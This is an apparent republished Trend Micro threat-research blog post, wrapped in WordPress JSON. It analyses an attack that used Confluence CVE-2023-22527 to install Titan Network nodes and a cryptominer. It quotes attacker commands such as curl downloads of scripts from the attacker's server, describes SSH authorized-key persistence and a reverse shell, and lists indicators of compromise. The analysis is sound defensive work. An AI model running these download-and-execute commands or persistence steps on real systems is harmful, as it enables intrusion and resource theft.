{"id":57536,"date":"2024-10-30T00:00:00","date_gmt":"2024-10-30T00:00:00","guid":{"rendered":"urn:uuid:8edc3119-2f51-38e1-b313-3da653f550c9"},"modified":"2024-10-30T00:00:00","modified_gmt":"2024-10-30T00:00:00","slug":"attacker-abuses-victim-resources-to-reap-rewards-from-titan-network","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","title":{"rendered":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.622695403791\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"2087699125\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.7774725274725\">\n<div class=\"article-details\" role=\"heading\" readability=\"37.06043956044\"> <span 
class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">In this blog entry, we discuss how an attacker took advantage of the Atlassian Confluence vulnerability CVE-2023-22527 to connect servers to the Titan Network for cryptomining purposes.<\/p>\n<p class=\"article-details__author-by\">By: Ranga Duraisamy, Sunil Bharti <time class=\"article-details__date\">October 30, 2024<\/time> <\/p>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"40.436354378819\">\n<div readability=\"26.628818737271\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">Trend Micro researchers observed an attacker exploiting the Atlassian Confluence vulnerability CVE-2023-22527 to achieve remote code execution for cryptomining via the Titan Network.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malicious actor used public IP lookup services and various system commands to gather details about the compromised machine.<\/span><\/li>\n<li><span 
class=\"rte-red-bullet\">The attack involved downloading and executing multiple shell scripts to install Titan binaries and connect to the Titan Network with the attacker\u2019s identity.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malicious actor connects compromised machines to the Cassini Testnet, which allows them to participate in the delegated proof of stake system for reward tokens.<\/span><\/li>\n<\/ul>\n<p>Recently, we observed an attack where an attacker exploited the Atlassian Confluence server vulnerability <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-22527\" target=\"_blank\" rel=\"noopener\">CVE-2023-22527<\/a>. This allowed unauthenticated attackers to achieve remote code execution (RCE) and leverage the <a href=\"https:\/\/www.titannet.io\/\" target=\"_blank\" rel=\"noopener\">Titan Network<\/a> for cryptomining activity. Titan Network, which is based on decentralized physical infrastructure networks (DePIN), is an open-source platform that allows users to share and deploy hardware resources, turning them into valuable digital assets like computing power, storage, and bandwidth. Its economic incentives and network design ensure that contributors are rewarded for their resources, while end-users enjoy high-quality, reliable results comparable to modern cloud services. In the attack, the malicious actor compromises victims\u2019 machines and installs Titan edge nodes to reap those rewards.<\/p>\n<h4>Attack sequence<\/h4>\n<p>The attacker tried to compromise the Atlassian Confluence server using CVE-2023-22527, an unauthenticated template injection vulnerability. In the attack payload, the attacker sets a response header \u201cCmd\u201d, which contains the result of the commands the attacker executed. 
The attack starts with the attacker executing the \u201cls\u201d command to check the files in the current directory; the response of this command can be seen in the \u201cCmd\u201d response header (Figure 2).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig01.png\" alt=\"Figure 1. Attack chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Attack chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig02.jpg\" alt=\"Figure 2. The \u201cls\u201d remote command execution and its response\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. The \u201cls\u201d remote command execution and its response<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Afterwards, the attacker executes the \u201cpwd\u201d command to find the current working directory, as shown in Figure 3.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig03.jpg\" alt=\"Figure 3. Request and response of \u201cpwd\u201d command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. 
Request and response of \u201cpwd\u201d command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"28.56976744186\">\n<div readability=\"7.2558139534884\">\n<p>The attacker utilizes the public IP address lookup services <a href=\"https:\/\/ipinfo.io\/\">IPinfo<\/a> and <a href=\"https:\/\/ip-api.com\/\">IP-API<\/a> to identify the server\u2019s additional IP addresses.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig04.jpg\" alt=\"Figure 4. Public IP lookup request\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Public IP lookup request<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div readability=\"21\">\n<p>The attacker checks the files present in \u201c\/tmp\u201d via the \u201cls \/tmp\u201d command. Then, the attacker gathers details about the operating system via the \u201ccat \/etc\/os-release\u201d command and collects detailed information about the system via the \u201cuname -a\u201d command by executing the system commands remotely, similar to how they used \u201cexec({\u2018curl ip-api.com\u2019})\u201d to execute the commands on the victim\u2019s machine, as shown in Figure 4.<\/p>\n<p>After collecting the required system details, the attacker checks the control group (cgroup) information for the process with PID 1, which is typically the \u201cinit\u201d process in a Linux system. 
By doing so, the attacker is possibly trying to determine whether the Atlassian Confluence server is running inside a container; the output of this file can also be used later for privilege escalation.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig05.jpg\" alt=\"Figure 5. Enumeration of \u201ccgroup\u201d \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Enumeration of \u201ccgroup\u201d <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>The attacker then executed commands remotely, as in Figure 4, to check system resources: disk space with \u201cdf -h\u201d and available memory with \u201cfree -g\u201d.<\/p>\n<p>As shown in Figure 6, once the attacker has collected the system and resource details, they download a shell script file named \u201c0\u201d, hosted at 3[.]39[.]22[.]13, to the \u201c\/tmp\u201d directory of the compromised server as \u201ca0\u201d. To avoid file extension-based detections, the attacker does not append a file extension.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig06.jpg\" alt=\"Figure 6. Shell script download request\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. 
Shell script download request<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The downloaded shell script shown in Figure 6 downloads the file \u201ctitan.tar.gz\u201d from the same server, then extracts the Executable and Linkable Format (ELF) files \u201ctitan-edge\u201d and \u201clibgoworkerd.so\u201d into the \u201c\/tmp\u201d directory (Figure 7).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig07.png\" alt=\"Figure 7. Extracts the Titan binaries\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Extracts the Titan binaries<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.930066079295\">\n<div readability=\"13.76872246696\">\n<p>Another shell script file named \u201c1\u201d was downloaded to the \u201c\/tmp\u201d directory as \u201ca1\u201d via the <i>curl -o \/tmp\/a1 3[.]39[.]22[.]13\/1<\/i> command, in the same way as the \u201c0\u201d script file. This script overwrites the \u201cLD_LIBRARY_PATH\u201d environment variable. However, \u201cLD_LIBRARY_PATH\u201d is misspelled as \u201cLD_LIZBRARY_PATH\u201d; it is not certain whether this is a typo or an intentional misspelling. Then, the \u201ctitan-edge\u201d daemon starts to initialize a connection with the Titan Network (Figure 8). 
The attacker connects to \u201c<a href=\"https:\/\/titannet.gitbook.io\/titan-network-en\/cassini-testnet\/about-cassini-testnet\" target=\"_blank\" rel=\"noopener\">Cassini Testnet<\/a>\u201d, which consists of two main components:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Blockchain Network<\/b> &#8211; Based on the Delegated Proof of Stake (DPOS) consensus mechanism, users earn rewards by staking TTNT test tokens to participate in the governance and interaction of the chain<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Resource Network<\/b> &#8211; If you have idle hardware device resources, you can run Titan nodes and earn TNT3 point rewards<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig08.png\" alt=\"Figure 8. Connects to the Titan Network\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Connects to the Titan Network<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The third shell script file, named \u201c2\u201d, was downloaded to the \u201c\/tmp\u201d directory as \u201ca2\u201d via the \u201ccurl -o \/tmp\/a2 3[.]39[.]22[.]13\/2\u201d command, as with the previous steps. This script executes a \u201ctitan-edge\u201d binary with \u201cstorage-size\u201d and \u201cstorage-path\u201d configuration. 
The device is then bound to \u201ctitan-edge\u201d with the attacker\u2019s identity code, \u201c08DA69AE-6E7C-43F2-A8D0-D97D7FF517A1\u201d (Figure 9).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig09.png\" alt=\"Figure 9. Binds \u201ctitan-edge\u201d to the attacker\u2019s identity\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Binds \u201ctitan-edge\u201d to the attacker\u2019s identity<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>As with the previous steps, the attacker downloads the fourth shell script file as \u201ca3\u201d to the \u201c\/tmp\u201d directory via the \u201ccurl -o \/tmp\/a3 3[.]39[.]22[.]13\/3\u201d command, which saves the node\u2019s unique ID using the \u201cinfo\u201d argument into \u201cinfo.log\u201d file (Figure 10).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig10.png\" alt=\"Figure 10. Saves \u201ctitan-edge\u201d info into the \u201cinfo.log\u201d file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. 
Saves \u201ctitan-edge\u201d info into the \u201cinfo.log\u201d file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The fifth shell script file is downloaded as \u201ca4\u201d to the \u201c\/tmp\u201d directory via the \u201ccurl -o \/tmp\/a4 3[.]39[.]22[.]13\/4\u201d command, which would stop the \u201ctitan-edge\u201d daemon (Figure 11).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig11.png\" alt=\"Figure 11. Script file to stop the \u201ctitan-edge\u201d daemon\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Script file to stop the \u201ctitan-edge\u201d daemon<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Once all the files are downloaded into the victim\u2018s machine, the attacker validates those in the \u201c\/tmp\u201d folder (Figure 12).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig12.jpg\" alt=\"Figure 12. Request and response of \u201cls \/tmp\u201d command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. 
Request and response of \u201cls \/tmp\u201d command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Then the attacker executes the first downloaded file \u201ca0\u201d, shown below in Figure 13.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig13.jpg\" alt=\"Figure 13. Execution of a0 script file \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. Execution of a0 script file <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"42.067246111619\">\n<div readability=\"30.946020128088\">\n<p>This script file downloads the \u201ctitan-edge\u201d binaries from \u201ctitan.tar.gz\u201d, as described earlier. It verifies if the downloaded file is present by executing the \u201cls -lh \/tmp\u201d command remotely over the attack payload.<\/p>\n<p>Once the attacker confirms that the \u201ctitan-edge\u201d binaries are downloaded into the system, they execute other scripts&nbsp; (a1, a2, a3 and a4); these execute the Titan binaries, connect to the Titan network, and bind the Titan Network to the attacker\u2019s ID. Similarly, the attacker also deploys shell scripts \u201c5\u201d, \u201c6\u201d, \u201c7\u201d as \u201ca5\u201d, \u201ca6\u201d, and \u201ca7\u201d, respectively. 
The \u201ca5\u201d script file is kind of a fail-safe script: in case the \u201ca0\u201d script doesn\u2019t download and extract the files properly, this script file downloads the same Titan binaries from <a href=\"https:\/\/github.com\/Titannet-dao\/titan-node\/releases\/download\/v0.1.19\/titan-l2edge_v0.1.19_patch_linux_amd64.tar.gz\" target=\"_blank\" rel=\"noopener\">the official Titan GitHub repository<\/a>.<\/p>\n<p>After the successful deployment and connection to the Titan Network, the attacker installs the \u201caleo-pool\u201d client to connect to the \u201czkRush Pool\u201d server and \u201cAleo TestNet Beta\u201d for cryptomining using the shell script \u201ca6\u201d (Figure 14).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig14.jpg\" alt=\"Figure 14. The \u201ca6\u201d shell script downloads the \u201caleo-pool\u201d client\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. The \u201ca6\u201d shell script downloads the \u201caleo-pool\u201d client<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>It executes the \u201caleo-pool\u201d client via the \u201ca7\u201d script and connects to the aleo[.]zkrush[.]com pool server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig15.jpg\" alt=\"Figure 15. Connects to mining pool server\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. 
Connects to mining pool server<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>We also found other files in the attacker\u2019s file server, which seem like they are used to make lateral movement attempts through SSH in the Amazon Web Services (AWS) cloud. In the \u201ca8\u201d script, the attacker downloads and deploys the SSH public key in the RSA format in the root user directory \u201c\/root\/.ssh\/authorized_keys\u201d.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig16.jpg\" alt=\"Figure 16. SSH public key deployment\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. SSH public key deployment<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The observed SSH public key is as follows:<\/p>\n<p><b data-rte-class=\"rte-temp\"><span class=\"blockquote\">\u201cssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl+1YDRZdck+HOkzQwdAWzLkdn1Ws1jmgE9aC93iUuzJlpsMhKkkkziWozsYZrQv7j3Tx1QWtSZg8J5VxMmSY0MhzefdhTYZ0Pf9XYPlVsQiLkBTDeoKyyWZS4NwZBysSzE20\/jq0Ke4tnFIEe39lP1OaIShLofktHKXsx0xUkfDxFMiDgw2nB4cXhATqdhC3nFQXl0wdlzih0\/Yw+QlHoZbQ6\/3kJIdw7kWL1N8GcAkjUtaRK6vONwluEi9HIyNsLVUVqS74v4NNRdKA8Rwdg8R5CQSRnzXaD3e+5tmFIkSzArIQQVktDt+Re6z4ZVYFfNfdjCxeqGTJLP6Yt\/iE7 aaaaaa-1%\u201d<br \/><\/span><\/b>\n<\/p>\n<p>The \u201ca9\u201d file is a modified SSH config file that the attacker possibly uses later to modify the current SSH config file. 
This updated file contains two noticeable directives, \u201cAuthorizedKeysCommand\u201d&nbsp;and&nbsp;\u201cAuthorizedKeysCommandUser\u201d (Figure 17).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig17.jpg\" alt=\"Figure 17. SSH directives to connect with AWS EC2 instance\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. SSH directives to connect with AWS EC2 instance<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>The SSH daemon uses&nbsp;\u201cAuthorizedKeysCommand\u201d&nbsp;and&nbsp;\u201cAuthorizedKeysCommandUser\u201d, which are configured when Instance Connect is installed, to look up the public key from the instance metadata for authentication and connect to the EC2 instance.<\/p>\n<p>We observed another variant of the file named \u201c7\u201d, which performs the bash reverse shell to the C&amp;C server 13[.]236[.]179[.]8 over tcp port 80 (Figure 18).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/j\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/TitanNetwork-Fig18.jpg\" alt=\"Figure 18. Bash reverse shell\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. 
Bash reverse shell<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.922965116279\">\n<div readability=\"22.364825581395\">\n<h4>Conclusion<\/h4>\n<p>By executing a series of reconnaissance, payload deployment, and persistence mechanisms, the attacker efficiently co-opted server resources to integrate compromised systems into the Titan Network for their financial gain. This incident underscores the importance of maintaining up-to-date security patches, rigorous network and file monitoring, and robust access controls.&nbsp;<\/p>\n<p>To mitigate the risk of this kind of threat, organizations can also consider powerful security technologies such as&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a>, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h4>MITRE ATT&amp;CK techniques<\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"7\">\n<tr>\n<td width=\"208\" valign=\"top\"><b>Tactic<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>Technique<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>Technique ID<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Initial Access<\/td>\n<td width=\"208\" valign=\"top\">Exploit Public-Facing Application<\/td>\n<td width=\"208\" valign=\"top\">T1190<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" rowspan=\"3\" valign=\"top\">Discovery<\/td>\n<td width=\"208\" valign=\"top\">System Information Discovery<\/td>\n<td width=\"208\" valign=\"top\">T1082<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">File and Directory Discovery<\/td>\n<td width=\"208\" 
valign=\"top\">T1083<\/td>\n<\/tr>\n<tr>\n<td width=\"208\" valign=\"top\">Process Discovery<\/td>\n<td width=\"208\" valign=\"top\">T1057<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Execution<\/td>\n<td width=\"208\" valign=\"top\">Command and Scripting Interpreter:&nbsp;Unix Shell<\/td>\n<td width=\"208\" valign=\"top\">T1059.004<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" rowspan=\"2\" valign=\"top\">Persistence<\/td>\n<td width=\"208\" valign=\"top\">Hijack Execution Flow:&nbsp;Dynamic Linker Hijacking<\/td>\n<td width=\"208\" valign=\"top\">T1574.006<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Account Manipulation:&nbsp;SSH Authorized Keys<\/td>\n<td width=\"208\" valign=\"top\">T1098.004<\/td>\n<\/tr>\n<tr>\n<td width=\"208\" rowspan=\"2\" valign=\"top\">Command and Control<\/td>\n<td width=\"208\" valign=\"top\">Ingress Tool Transfer<\/td>\n<td width=\"208\" valign=\"top\">T1105<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"208\" valign=\"top\">Application Layer Protocol:&nbsp;Web Protocols<\/td>\n<td width=\"208\" valign=\"top\">T1071.001<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/0<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/1<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/2<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/3<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/4<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/5<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/6<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/7<\/span><\/li>\n<li><span 
class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/8<\/span><\/li>\n<li><span class=\"rte-red-bullet\">http:\/\/3[.]39[.]22[.]13\/9<\/span><\/li>\n<li><span class=\"rte-red-bullet\">wss[:]\/\/aleo[.]zkrush[.]com:3333<\/span><\/li>\n<li><span class=\"rte-red-bullet\">13[.]236[.]179[.]8<\/span><\/li>\n<li><span class=\"rte-red-bullet\">35[.]74[.]215[.]126<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/j\/titan-network.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we discuss how an attacker took advantage of the Atlassian Confluence vulnerability CVE-2023-22527 to connect servers to the Titan Network for cryptomining purposes. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9509],"class_list":["post-57536","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-10-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan 
